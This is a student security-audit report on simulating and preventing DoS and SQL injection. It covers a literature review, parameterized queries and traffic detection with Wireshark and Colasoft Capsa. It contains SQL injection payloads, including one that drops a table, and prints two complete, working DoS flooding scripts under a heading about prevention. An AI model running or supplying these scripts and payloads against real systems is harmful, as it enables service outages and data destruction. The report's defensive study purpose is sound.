INFORMATION SECURITY ANALYSIS AND

AUDIT

SIMULATION & PREVENTION OF

DoS ATTACKS AND SQL INJECTION

PROJECT REPORT

Submitted by-

S.No NAME REGISTRATION NUMBER

1. Khushee Paprunia 18BIT0200
2 Harsh Agrawal 18BIT0209
3. Saasha Bansal 18BIT0201
4 Naman Parmani 18BIT0266
Abstract
DoS and SQL Injection being some of the most common forms of cyber-security
attacks, multiple papers which explore different mechanisms against these two
attacks have been published, but a perfect solution still eludes computer scientists.
Thus, our project aims to simulate the two attacks and hence find a robust detection
and defense system against DoS and SQL Injection attacks. A secure storage
procedure strategy is adopted to block SQL Injection Attacks.

Introduction
DDoS Attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. Such an
attack is often the result of multiple compromised systems (for example, a botnet) flooding
the targeted system with traffic. When a server is overloaded with connections, new
connections can no longer be accepted. The major advantages to an attacker of using a
distributed denial- of-service attack are that multiple machines can generate more attack
traffic than one machine, multiple attack machines are harder to turn off than one attack
machine, and that the behaviour of each attack machine can be stealthier, making it harder to
track and shut down.

SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution (e.g. to dump the
database contents to the attacker). SQL injection must exploit a security vulnerability in an
application's software, for example, when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly typed and
unexpectedly executed. SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or changing balances,
allow the complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
Usually, attackers can use evil character like quote (’) to check whether they can do SQL
injection on the system. For example, the internal SQL query of the system is “SELECT *
FROM User WHERE username = ‘” + username + “’;” and an attacker’s input is “evil’s”.
This would generate a SQL query SELECT * FROM User WHERE username = ‘evil’s’
which will make a syntax error happen for executing query on database. After the attacker
finds the security bug of the system, he can utilize it to do further SQL injections to modify
the system maliciously.
Problem Statement
1. Open Web Application Security Project (OWASP), the globally recognized
standard awareness document for developers and web application security
consistently points out that database injection and Denial of Service (DoS) Attacks
are the greatest security risk to modern web applications.
2. Acknowledging these growing web security risks, we aim to suggest security
patches that can help safeguard organizations and critical information.

Literature Review:

S no. Title Author Journal Year Abstract

1 SQL injection Voitovych, 2016 This paper
prevention Olesya & explores three
system approaches to
Yuvkovetskyi, prevent SQL
O. & Injection
Kupershtein, Attacks. The
Leonid et. al first method is
converting
special
characters to
HTML entities.
Another two
methods are
using regular
expressions and
exceptions. The
proposed
protection
system is
designed as a set
of scripts that
inbuilt to the
webpage
resources
2 Review of SQL Mohd Yunus, INTERNATION 2018 This paper
Mohd Amin & demonstrates the
Injection : AL JOURNAL
adaption of
Problems and Brohan, ON Blockchain
Prevention Muhammad & INFORMATICS concept to avoid
Mohd Nawi et. VISUALIZATIO an SQL injection
al. attack. Here each
N node is
requested to
access another
node’s database
and the node
requested is
verified by the
node who
accepted the
request. If not
accepted, the
request is
rejected for
security purpose.
The concept is
applied to all
nodes. A node
could be a
server, computer
etcetera on
computer system
networking.

3 STUDY ON S. Som, S. International 2016 This paper has

Sinha, R. Kataria demonstrated a
SQL Journal of
et. al. strategy to
INJECTION Engineering change over
ATTACKS: Applied SQL query into
MODE, Sciences and number of
helpful tokens
DETECTION Technology, by applying
AND 2016 Vol. 1, tokenization and
PREVENTION Issue 8, ISSN after that
No. 2455-2143, encoding all
literals, fields,
Pages 23-29 table and
information on
the query by
AES-algorithm
to avoid SQLIA.
4 A Study on Mukhopadhyay, 2010 This paper
Debajyoti & Oh, presents four
Recent
major
Approaches in Byung-Jun & approaches that
Handling DDoS Shim et. al. are considered
Attacks by the experts to
tackle DDoS
Attacks- Rate
Limit solution,
Defense by
Offense, Active
Filtering solution
and IP Trace
back approach.

5 Protection from Tao Peng, 2003 Tao Peng,

Christopher Christopher
Distributed
Leckie, Kotagiri Leckie, Kotagiri
Denial of Ramamohanarao Ramamohanarao
Service Attack et. al. et. al.
Using History- This paper
introduces a
based IP practical scheme
Filtering to defend against
DDoS attacks
based on IP
source address
filtering. The
edge router
keeps a history
of all the
legitimate IP
addresses which
have previously
appeared in the
network. When
the edge router is
overloaded, this
history is used to
decide whether
to admit an
incoming IP
packet.
6 A Distributed- Yinan Jing, 20th 2006 IP traceback is
Log-based IP Jingtao Li, one of the most
International
Traceback Xueping Wang, effective
Scheme to Xiaochun et. al. Conference on techniques to
Defeat DDoS defeat these
Attacks Advanced attacks by
Information identifying
attack sources
Networking and even in the
Applications - presence of IP
spoofing.
Volume 1 Because of low
(AINA'06) marking packet
utilization, the
convergence
time of
traditional
probabilistic
packet marking
(PPM) schemes
is still too long.
In order to
shorten the
convergence
time, a
distributedlog-
based IP
traceback
scheme is
proposed.

7 A study on SQL Ruby Devi, R International 2016 This study paper

injection Venkatesan, Journal of is prepared to
techniques Raghuraman Pharmacy and give a
Koteeswaran Technology comprehensive
coverage about
topics like basics
of SQL
Injection, types,
recent attacks as
a case study.
 8 A STUDY ON Bhawna Sinha, - 2019 This paper
DDOS Sushmita mainly focuses
ATTACKS, Chakraborty, on the DDoS
DANGER AND Praveen Kumar attack which
ITS obstruct the
PREVENTION network
availability by
overflowing the
victim with high
volume of illegal
traffic usurping
its bandwidth,
overburdening it
to prevent valid
traffic to get
through. We
have also
described the
various types of
DoS attack
techniques that
are inflicted
upon the ISPs.
The study of this
research is to
find out the
various
techniques to
prevent these
attacks along
with their
mitigation
techniques and
to find out any
possible
solution.

Aim
Simulate a DoS and SQL Injection attacks and observe system/application behaviour during
attack period and then suggest and recommend robust defence and detection mechanism
against DDoS Attack and SQL Injections.

Software Used
• ColaSoft Capsa
• phpMyAdmin
• XAMMP
• Wireshark

Proposed Methodology
● DoS Attack Prevention: The project shall demonstrate the functionality of software tools
such as Capsa’s Enterprise Edition, Colasoft Capsa and Capsa’s Alarm Explorer to detect
and mitigate DoS attacks.
● SQL Injection Attack Simulation: To simulate an SQL Injection, we plan on creating a
vulnerable webpage, specifically to access its database using myPhpAdmin and XAMPP.
● SQL Injection Attack Prevention: We plan on using prepared statements with variable
binding (aka parameterized queries) to first define all the SQL code, and then pass in each
parameter to the query later. This coding style allows the database to distinguish between
code and data, regardless of what user input is supplied. Prepared statements ensure that
an attacker is not able to manipulate the intent of a query and gain access.
● DoS Attack Simulation: To simulate DoS attack on a system in a given WiFi network, we
plan on using Wireshark to analyse incoming packets target’s device.

Implementation:
Prevention of SQLi:
We’ve created a website of our own to show how the attackers use vulnerable
userinputs to make an sql injection attack successful. After that, we used
parameterized queries in our sql statements to prevent the attackers from taking
down our website.

Fig1- Tables stored in the Database

 Fig 2- Contents stored in the table called ‘users’

Fig 3 & 4- Output on logging in normally

Fig 5 & 6- The attacker tries to manipulate SQL commands to access database by entering ‘ or ‘1’
‘ =1 which further changed the query to a query which contains “or” conditions which targets sql
to show all the records.
Another example of what sql injection can do:

Fig 7 & 8- Suppose instead of mysqli_query function, we use mysqli_multi_query function. Clearly, the
statement ; DROP TABLE important; SELECT * FROM 'users' where '1' = '1 contains more than one
query. One of these queries triggers the Database to drop the table called “important”.

Security Patch Recommendations:

A security patch is a change applied to an asset to correct the weakness described by a

vulnerability. This corrective action will prevent successful exploitation and remove or
mitigate a threat's capability to exploit a specific vulnerability in an asset. Simulating both
SQL injection and DoS on vulnerable webpages and devices has given us valuable insight on
how to protect our devices against the same.
Code snippet that prevents SQL Injection:

Fig 9- Prepared statements ensure that an attacker is not able to manipulate the intent of a query
and gain access.
 Fig 10 & 11- The following screenshot demonstrates the capability of such prepared code fragments to
limit access to the database.

Preventing DoS or DDoS Attacks

Before attack:

After attack:

Code:
Code:
1)#!/usr/bin/python3
# -*- coding: utf-8 -*-

# python 3.3.2+ Hammer Dos Script v.1

# by Can Yalçın
# only for legal purpose

from queue import Queue

from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random

def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/
26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913
Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/
20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko)
Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/
20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/
20090718 Firefox/3.5.1")
return(uagent)

def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent':
random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)

def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent:
"+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--
packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)

def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()

def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()

def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const",
dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
 if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo

# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()

if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
 t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()

2)import socket
import threading

target = input("Enter The ip: ")

fake_ip = '182.21.20.32'
port = 80

attack_num = 0

def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()

global attack_num
attack_num += 1
print(attack_num)

for i in range(500):
thread = threading.Thread(target=attack)
 thread.start()
◦
Detection using Wireshark:

Look out for an immense number of TCP connection requests. The proper display filter is
tcp.flags.syn == 1 and tcp.flags.ack == 0
The server, that is under attack, will respond with a smaller number of SYN/ACKs. These
can be spotted with the display filter tcp.flags.syn == 1 and tcp.flags.ack == 1. Try to
compare the number of SYNs with the number of SYN/ACKs. As long as the numbers are
identical your firewall or server is holding up.
 Fig 12 & 13- Since, in the above case, the numbers are identical, the firewall/server is doing a
good job of keeping the system safe.

-We can also view Wireshark’s graphs for a visual representation of the uptick in
traffic.
-The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilization graph, as well as the total
traffic by bytes
-During flooding, it shows a massive spike in overall packets from near 0 to about a
thousands packets a second.
Using Colasoft Capsa:
DoS attacks are easy to recognise but extremely difficult to mitigate on a personal device. It
is possible to use software tools like Colasoft Capsa which make it easy and quick to detect
and locate network attacks. As such, the first point of call for detecting a DoS attack is the
dashboard. The overview of your network will make spikes in traffic quickly noticeable. You
should be able to notice an uptick in the global utilization graph, as well as the total traffic by
bytes:

Fig7. Representation of SYN flood attack on a PC

Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic
is detected:
Alternatively, Capsa’s Enterprise Edition can allow system/network administrators to
immediately start a security analysis profile, which has a dedicated DoS attack tab. It also
permits for the admins to look at TCP conversation details to quickly decode and verify
attacks:

Fig 8. Useful statistics for admins to look into TCP conversation

Going further we would like to remind the reader of the illegal and un-predictable nature of
a DoS/DDoS attack. So some other general security recommendations for networks and
businesses are stated as follows:

1. Planning: While setting up your website/network (internal or external) be sure to

also have a response strategy suitable to your networks architecture.
2. Security Response Team: Designate roles to members in network administration
or IT Teams at the event of such an attack.
3. Security Tools: Make sure your networks are well-equipped with key tools such as
firewalls, network monitoring software, anti-virus and anti-malware programs, as
well as threat monitoring systems. With these, you can monitor your network
baseline traffic and set up alerts for behavior that is out of the ordinary
4. Updated Software: All pre-defined systems must be kept updated to their latest
versions at all times. The existence of an unresolved bug can prove to be a loop-
 hole for an attacker.

Conclusion
SQL Injection and DoS attacks are two vastly different mode of attacks that have time and
again jeopardised businesses because of their tendency to be extremely invasive and highly
unpredictable. Through this project, we have attempted to simulate the two dangerous attacks
in well-monitored and legal environments to gather deep insight to their functioning. Our
observations have concluded that conducting such attacks only become difficult if the
target’s device does not have proper well-functioning network security mechanisms in place.
The acknowledgement of the same has led to us making practical security recommendations
to help better safe-guard networks and devices.

Future prospects
Cyber Attacks like SQL Injection and DoS pose great threat to all existent websites that
make use of SQL databases. Hence, it is extremely important to further research into both
cases to make sure that databases with sensitive information, complex network architectures
and personal devices stay secure.

In the case of SQL Injection, the adopted design can be improved to incorporate features that
can prevent attackers from signing up, using the database and accessing content. Various
code injection techniques may be developed over time and the security mechanisms must
constantly evolve to make sure that each of these fraudulent attempts is prevented. In
addition to this different layers of access based on authorisation could be incorporated to
ensure confidentiality at each level. Owing to their highly unpredictable nature, DoS attacks
can take organisations completely by surprise. It is important to support and promote the
evolution of various network security tools. It is important to make sure such incidents be
taken up seriously as cyber security violations and free tools must be distributed to small
businesses and other networks for additional protection.
References
1. Voitovych, Olesya & Yuvkovetskyi, O. & Kupershtein, Leonid. (2016). SQL injection
prevention system. 1-4. 10.1109/UkrMiCo.2016.7739642.
2. Mohd Yunus, Mohd Amin & Brohan, Muhammad & Mohd Nawi, Nazri & Salwana,
Ely & Najib, Nurhakimah & Liang, Chan. (2018). Review of SQL Injection:
Problems and Prevention. JOIV: International Journal on Informatics Visualization. 2.
215. 10.30630/joiv.2.3-2.144.
3. Mahapatra, Rajendra. (2012). A Survey Of Sql Injection Countermeasures.
International Journal of Computer Science & Engineering Survey. 3. 55-74. 10.5121/
ijcses.2012.3305.
4. S. Som, S. Sinha, R. Kataria, “Study On SQL Injection Attacks: Mode, Detection And
Prevention”, International Journal of Engineering Applied Sciences and Technology
(IJEAST), Vol. 1, Issue 8, ISSN No. 2455-2143, 2016.
5. Mukhopadhyay, Debajyoti & Oh, Byung-Jun & Shim, Sang-Heon & Kim, Young-
Chon. (2010). A Study on Recent Approaches in Handling DDoS Attacks.
6. Yinan Jing, Jingtao Li, Xueping Wang, Xiaochun Xiao and Gendu Zhang, "A
Distributed-Log-based IP Traceback Scheme to Defeat DDoS Attacks," 20th
International Conference on Advanced Information Networking and Applications -
Volume 1 (AINA'06), Vienna, 2006, pp. 25-32, doi: 10.1109/AINA.2006.22.
7. Tao Peng, Christopher Leckie, Kotagiri Ramamohanarao; Protection from distributed
denial of service attacks using history-based IP filtering; IEEE International
Conference on Communications, 11-15 May 2003; pp.482 - 486.
8. Peng, T, Leckie, C, Ramamohanarao, K. Survey of network-based defense
mechanisms countering the DoS and DDoS problems. ACM Comput Surv 2007;
39(1): 3
9. Zargar, ST, Joshi, J, Tipper, D. A survey of defense mechanisms against distributed
denial of service (DDoS) flooding attacks. IEEE Commun Surv Tut 2013; 15(4):
2046– 2069.
10. Mahjabin, Tasnuva & Xiao, Yang & Sun, Guang & Jiang, Wangdong. (2017). A survey
of distributed denial-of-service attack, prevention, and mitigation techniques.
International Journal of Distributed Sensor Networks. 13. 155014771774146.
10.1177/1550147717741463.